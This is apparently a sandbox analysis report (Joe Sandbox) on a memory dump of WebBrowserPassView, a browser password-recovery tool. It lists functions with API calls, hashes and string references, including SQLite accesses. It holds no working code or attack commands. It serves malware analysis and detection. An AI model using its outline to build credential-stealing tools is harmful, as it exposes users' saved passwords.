API ID: memcpy$memcmpmemsetstrlen$strcpy
String ID:
API String ID: 1095719737-0
Opcode ID: 74240cb5f961abd085359b0634ca8e8dff2a69e9ecdb28326ef061e22fa89259
Instruction ID: 9ce700d3882f5f923fbb2479c9cfede1bda771696aaf60353e7394d058dfcfd5
Opcode Fuzzy Hash: 74240cb5f961abd085359b0634ca8e8dff2a69e9ecdb28326ef061e22fa89259
Instruction Fuzzy Hash: 693165B190070DBEEB20DAB0CC45EDFB7BCEB49304F00443AE655A6181E776AA498B65

Uniqueness

Uniqueness Score: -1.00%

Function 0041F7EB Relevance: 6.3, APIs: 5, Instructions: 82COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0041F7FE
memcpy.MSVCRT ref: 0041F814
memcmp.MSVCRT ref: 0041F823
memcmp.MSVCRT ref: 0041F86B
memcpy.MSVCRT ref: 0041F886

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memcpy$memcmp
String ID:
API String ID: 3384217055-0
Opcode ID: 37284c2f66642d2ddd48264b57aea92c17a23a416b39e5917ac6500f9f335e0f
Instruction ID: eba548dffeb7cbb86d277e9e8be7ea604d675ef8a9d9add480594eb241d03b37
Opcode Fuzzy Hash: 37284c2f66642d2ddd48264b57aea92c17a23a416b39e5917ac6500f9f335e0f
Instruction Fuzzy Hash: 9D217F76E10208ABDB14EBA6D841EDF73ECAF44704F14482AF516D7181EB38E649C665

Uniqueness

Uniqueness Score: -1.00%

Function 00412577 Relevance: 6.3, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00412596
memset.MSVCRT ref: 004125AC
memset.MSVCRT ref: 004125BE
memcpy.MSVCRT ref: 004125E3
memset.MSVCRT ref: 004125ED

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: 080f722c0ffb7d8c385f632dd20dccb4c50922f07ff88e280dd473830913b811
Instruction ID: a4c7653764e20342dfd6e83a4be63b5372cd9455a0b84470ab9be2deaa940da2
Opcode Fuzzy Hash: 080f722c0ffb7d8c385f632dd20dccb4c50922f07ff88e280dd473830913b811
Instruction Fuzzy Hash: B30128B1A80B007AE3357B35CC43F6A73A4AB91714F010A1EF252966C2DBA8A244817E

Uniqueness

Uniqueness Score: -1.00%

Function 004108E2 Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004020E9: GetMenu.USER32(?), ref: 00402107
Part of subcall function 004020E9: GetSubMenu.USER32 ref: 0040210E
Part of subcall function 004020E9: EnableMenuItem.USER32 ref: 00402126

Part of subcall function 00402130: SendMessageW.USER32(?,00000412,?,00000000), ref: 00402147
Part of subcall function 00402130: SendMessageW.USER32(?,00000411,?,?), ref: 0040216B

GetMenu.USER32(?), ref: 00410AD4
GetSubMenu.USER32 ref: 00410AE1
GetSubMenu.USER32 ref: 00410AE4
CheckMenuRadioItem.USER32 ref: 00410AF0

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: Menu$ItemMessageSend$CheckEnableRadio
String ID:
API String ID: 1889144086-0
Opcode ID: b29996890921790c89765a35e80ffc15c9887586477020220e0e376b9c9daa8c
Instruction ID: 6d8cac7b40754edf87d272c1bfb0116240dcbcd3534315d38a6e00175b30c6d6
Opcode Fuzzy Hash: b29996890921790c89765a35e80ffc15c9887586477020220e0e376b9c9daa8c
Instruction Fuzzy Hash: FD518670A40304BBEB209B66CD4AF9FBBF9EB84704F10046DB245772E2C6B56D91D754

Uniqueness

Uniqueness Score: -1.00%

Function 00419F2C Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON

Download Yara Rule

APIs

CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 0041A00F
MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 0041A03A
GetLastError.KERNEL32 ref: 0041A061
CloseHandle.KERNEL32(00000000), ref: 0041A077

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: File$CloseCreateErrorHandleLastMappingView
String ID:
API String ID: 1661045500-0
Opcode ID: 4d39a1befb4b444ca1625393fd6a5d283320a0bed10b0f3eee81afd0bc35f62a
Instruction ID: 44d3c2b2ec300ebaed5fc3dda4e0471611584753ac233c2b16f5379b4c7cc4bc
Opcode Fuzzy Hash: 4d39a1befb4b444ca1625393fd6a5d283320a0bed10b0f3eee81afd0bc35f62a
Instruction Fuzzy Hash: C4515A752053029FD724CF25C980AA7BBE5FF88305F10492EF88687651E734ED98CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00430AD1 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 00417A12: memset.MSVCRT ref: 00417A2C

memcpy.MSVCRT ref: 00430BB9

Strings

Cannot add a column to a view, xrefs: 00430B26
sqlite_altertab_%s, xrefs: 00430B8A
virtual tables may not be altered, xrefs: 00430B10

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memcpymemset
String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
API String ID: 1297977491-2063813899
Opcode ID: 275910ba7e0f0c96ad37673a583fd695216ffdde9dc2204ffc985ed4bb567882
Instruction ID: 72999ff3d0cfdfb5e9367ee4ed3faa0f46e6dce2196ea4cba2caab35ae0537ad
Opcode Fuzzy Hash: 275910ba7e0f0c96ad37673a583fd695216ffdde9dc2204ffc985ed4bb567882
Instruction Fuzzy Hash: 80418E71A00205EFCB08DF59C881A99B7F0FF08314F25966AE848AB352D779ED50CB88

Uniqueness

Uniqueness Score: -1.00%

Function 00406900 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00406947

Part of subcall function 0040D5E2: GetModuleHandleW.KERNEL32(00000000,?,?,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D621
Part of subcall function 0040D5E2: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D6BA
Part of subcall function 0040D5E2: memcpy.MSVCRT ref: 0040D6FA

Part of subcall function 0040D5E2: wcscpy.MSVCRT ref: 0040D663
Part of subcall function 0040D5E2: wcslen.MSVCRT ref: 0040D681
Part of subcall function 0040D5E2: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D68F

Part of subcall function 0040AA19: memset.MSVCRT ref: 0040AA3A
Part of subcall function 0040AA19: _snwprintf.MSVCRT ref: 0040AA6D
Part of subcall function 0040AA19: wcslen.MSVCRT ref: 0040AA79
Part of subcall function 0040AA19: memcpy.MSVCRT ref: 0040AA91
Part of subcall function 0040AA19: wcslen.MSVCRT ref: 0040AA9F
Part of subcall function 0040AA19: memcpy.MSVCRT ref: 0040AAB2

Part of subcall function 0040A7D1: GetOpenFileNameW.COMDLG32(?), ref: 0040A81A
Part of subcall function 0040A7D1: wcscpy.MSVCRT ref: 0040A828

Strings

x=E, xrefs: 0040696D
*.*, xrefs: 00406988
dat, xrefs: 0040694C

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memcpywcslen$HandleModulememsetwcscpy$FileLoadNameOpenString_snwprintf
String ID: *.*$dat$x=E
API String ID: 3589925243-2636922731
Opcode ID: 5b1c68347a222ffadd2cfbfa5b6b642c86afeb0b6d325ee6a9cca5e14e506a85
Instruction ID: d7f72c37b5c0960b3a93de2d3de2f44bd36794eda0f7d1f606609bc45afe3b75
Opcode Fuzzy Hash: 5b1c68347a222ffadd2cfbfa5b6b642c86afeb0b6d325ee6a9cca5e14e506a85
Instruction Fuzzy Hash: DF418671A00205AFDB04FF61DD46A9E77B9FF00318F11C02BF906A71D1EB79A9958B84

Uniqueness

Uniqueness Score: -1.00%

Function 0041078D Relevance: 6.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

Part of subcall function 0040E814: ??2@YAPAXI@Z.MSVCRT ref: 0040E835
Part of subcall function 0040E814: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FC

wcslen.MSVCRT ref: 004107BB
_wtoi.MSVCRT ref: 004107C7
_wcsicmp.MSVCRT ref: 00410815
_wcsicmp.MSVCRT ref: 00410826

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: _wcsicmp$??2@??3@_wtoiwcslen
String ID:
API String ID: 1549203181-0
Opcode ID: 521bfcc9bad965401c26efa2b72ae5d9106d53d3b49f8bb5091054076f9510e0
Instruction ID: be044668a024ec5caeb14a2b8b02c3aaa195db98e278daf5b9384581b1cfce75
Opcode Fuzzy Hash: 521bfcc9bad965401c26efa2b72ae5d9106d53d3b49f8bb5091054076f9510e0
Instruction Fuzzy Hash: 08418B31900308EFCB61EF5AC980AD9BBB4EF48315F1144AAEC15DB356D678DAC0CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00414F42 Relevance: 6.1, APIs: 4, Instructions: 100timeCOMMON

Download Yara Rule

APIs

CoCreateGuid.OLE32(00000000,?,?), ref: 00414F68

Part of subcall function 0040AD10: _snwprintf.MSVCRT ref: 0040AD6A

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00414FB9
free.MSVCRT(?,?,?), ref: 00415030
memcpy.MSVCRT ref: 00415063

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: Time$CreateFileGuidSystem_snwprintffreememcpy
String ID:
API String ID: 2968200804-0
Opcode ID: 2f9ba14a2f8dc736bd715059495414ae64c87d84619f28dbac8dd1c6da2f391f
Instruction ID: 25fc22cfe4b5cde183837428320e4c1379d013834ecb010c5ec9b74078343e2e
Opcode Fuzzy Hash: 2f9ba14a2f8dc736bd715059495414ae64c87d84619f28dbac8dd1c6da2f391f
Instruction Fuzzy Hash: 6E317A72D00619ABCF01EF55C8809DEB7B8AF88314F164276EC14FB241E738AE558BE5

Uniqueness

Uniqueness Score: -1.00%

Function 00411B65 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00411BA4

Part of subcall function 0040A6D5: ShellExecuteW.SHELL32(?,open,?,0044F4CC,0044F4CC,00000005), ref: 0040A6EB

SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 00411C14
GetMenuStringW.USER32 ref: 00411C2E
GetKeyState.USER32(00000010), ref: 00411C5A

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: ExecuteMenuMessageSendShellStateStringmemset
String ID:
API String ID: 3550944819-0
Opcode ID: 110857cfc2ea4ecf3d2e2f0a099ce967012f78d6f618a689b674ba793c676c63
Instruction ID: ebbdbb9de51bfb825555d7e990b9e0e06ff93dbce945c066a165325672d84fca
Opcode Fuzzy Hash: 110857cfc2ea4ecf3d2e2f0a099ce967012f78d6f618a689b674ba793c676c63
Instruction Fuzzy Hash: 1241D030640305DFDB309F25C888B9673B4AB50329F10857AEA699B2E2D778AD85CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040F041 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

free.MSVCRT(00000000), ref: 0040F09A
memcpy.MSVCRT ref: 0040F0AC
memcpy.MSVCRT ref: 0040F0DF

Strings

+>@, xrefs: 0040F0BC, 0040F059

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memcpy$free
String ID: +>@
API String ID: 2888793982-4232063742
Opcode ID: 80fa03900417df2a92a9176d47486ea1bc487edf58bdf5f2f086700b407fb3cc
Instruction ID: a4b117dcc49df0d4677d1a1554444a6f58dddbe622eac26ef29304aa8a98fb1c
Opcode Fuzzy Hash: 80fa03900417df2a92a9176d47486ea1bc487edf58bdf5f2f086700b407fb3cc
Instruction Fuzzy Hash: 25219030A00605EFCB20EF29CA4185ABBF6FF44314720467EE852E3B92E735EE519B55

Uniqueness

Uniqueness Score: -1.00%

Function 004124D9 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0041251C
memcpy.MSVCRT ref: 00412546
memcpy.MSVCRT ref: 0041256A

Strings

@, xrefs: 00412558

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memcpy
String ID: @
API String ID: 3510742995-2766056989
Opcode ID: 1a8ca5cada9ad0e9eb845eafeefd174272e9607b940f064bebe2dc7a1e42d05d
Instruction ID: e394cabee66379c814482ce599a1792370699005e64803ab7b2efeceeecbd966
Opcode Fuzzy Hash: 1a8ca5cada9ad0e9eb845eafeefd174272e9607b940f064bebe2dc7a1e42d05d
Instruction Fuzzy Hash: B9113BB25003047FCB289F25D9C0CAA77AAFF50344701062EF906C6252E674DFA586E9

Uniqueness

Uniqueness Score: -1.00%

Function 0040B4F8 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT ref: 0040B52D
memset.MSVCRT ref: 0040B53E
memcpy.MSVCRT ref: 0040B54A
??3@YAXPAX@Z.MSVCRT ref: 0040B557

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: ??2@??3@memcpymemset
String ID:
API String ID: 1865533344-0
Opcode ID: 6a9ccfb50fc4108f9dbe26ede857292e205a2522c4147adfaafbbb24ff864c13
Instruction ID: aafbb257eb0cb79d1a62da41bbc700b7fe6572c6948dd35e3e17e6ab681315f4
Opcode Fuzzy Hash: 6a9ccfb50fc4108f9dbe26ede857292e205a2522c4147adfaafbbb24ff864c13
Instruction Fuzzy Hash: 16118C71604601AFD328DF1DC891E26F7E5EFD9304B25892EE49A97381DB35E801CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0041638F Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004163BB

Part of subcall function 0040A912: _snwprintf.MSVCRT ref: 0040A957
Part of subcall function 0040A912: memcpy.MSVCRT ref: 0040A967

WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 004163E4
memset.MSVCRT ref: 004163EE
GetPrivateProfileStringW.KERNEL32 ref: 00416410

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
String ID:
API String ID: 1127616056-0
Opcode ID: fd369af08461e68e8af29ce9eb542014cb5cfd53075e89779255da270f569b26
Instruction ID: f3ab12530ca15f18597a66c6933a9b69f611745656a43028b292f8596be22397
Opcode Fuzzy Hash: fd369af08461e68e8af29ce9eb542014cb5cfd53075e89779255da270f569b26
Instruction Fuzzy Hash: 7C118EB2600219AFDF11AF65EC02EDE3B69EF05704F11006AFB05F2061E6359E648BAD

Uniqueness

Uniqueness Score: -1.00%

Function 00416A46 Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(?,?,?), ref: 00416A53
SizeofResource.KERNEL32(?,00000000), ref: 00416A64
LoadResource.KERNEL32(?,00000000), ref: 00416A74
LockResource.KERNEL32(00000000), ref: 00416A7F

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: c89b420d8ff8532ca3e3af3ec0f8793a4f0b21527573ef5156956d1d610aacd0
Instruction ID: 7a854b382b0c92d83852ff6be1e1e59c849c683da3176378bb1a11a70f524225
Opcode Fuzzy Hash: c89b420d8ff8532ca3e3af3ec0f8793a4f0b21527573ef5156956d1d610aacd0
Instruction Fuzzy Hash: D301D632600215ABCB158FA5DC4899BBF9EFF863A0709C03AFC45E6320DB30C984C6D8

Uniqueness

Uniqueness Score: -1.00%

Function 00416CF0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32(?), ref: 00416D00
SHBrowseForFolderW.SHELL32(?), ref: 00416D32
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00416D46
wcscpy.MSVCRT ref: 00416D59

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: BrowseFolderFromListMallocPathwcscpy
String ID:
API String ID: 3917621476-0
Opcode ID: 6a246380b1c5f8880238d42239ebf0d3dc96a60f32716ef5ab3fc8f08e63b26a
Instruction ID: e53360a3a95c928778c5eecace91b7a860d411a781c8edf1bb59ff18ee2a4c16
Opcode Fuzzy Hash: 6a246380b1c5f8880238d42239ebf0d3dc96a60f32716ef5ab3fc8f08e63b26a
Instruction Fuzzy Hash: AC11EC75A00208AFDB10DFA5D9889EEB7F8FB49304F10446AE505E7200DB38DB45CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00431D8F Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00431DCA
memset.MSVCRT ref: 00431DD4
memcpy.MSVCRT ref: 00431DFF

Strings

sqlite_master, xrefs: 00431DA2

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memcpy$memset
String ID: sqlite_master
API String ID: 438689982-3163232059
Opcode ID: 50ce9bdbcbbafd13e081e20970f75e6f660356cc808d36c36f9c0c11973c8031
Instruction ID: 9f101942a68db4e790d7b6a69b6e003f8a3c489338379646b69a5518e9817596
Opcode Fuzzy Hash: 50ce9bdbcbbafd13e081e20970f75e6f660356cc808d36c36f9c0c11973c8031
Instruction Fuzzy Hash: E101B972944218BAEB11BBA18C42FDEB77DFF04318F10055AF50062042D73AA615C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00410AFB Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0040D5E2: GetModuleHandleW.KERNEL32(00000000,?,?,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D621
Part of subcall function 0040D5E2: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D6BA
Part of subcall function 0040D5E2: memcpy.MSVCRT ref: 0040D6FA

_snwprintf.MSVCRT ref: 00410B28
SendMessageW.USER32(?,0000040B,00000000,?), ref: 00410B8D

Part of subcall function 0040D5E2: wcscpy.MSVCRT ref: 0040D663
Part of subcall function 0040D5E2: wcslen.MSVCRT ref: 0040D681
Part of subcall function 0040D5E2: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D68F

_snwprintf.MSVCRT ref: 00410B53
wcscat.MSVCRT ref: 00410B66

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
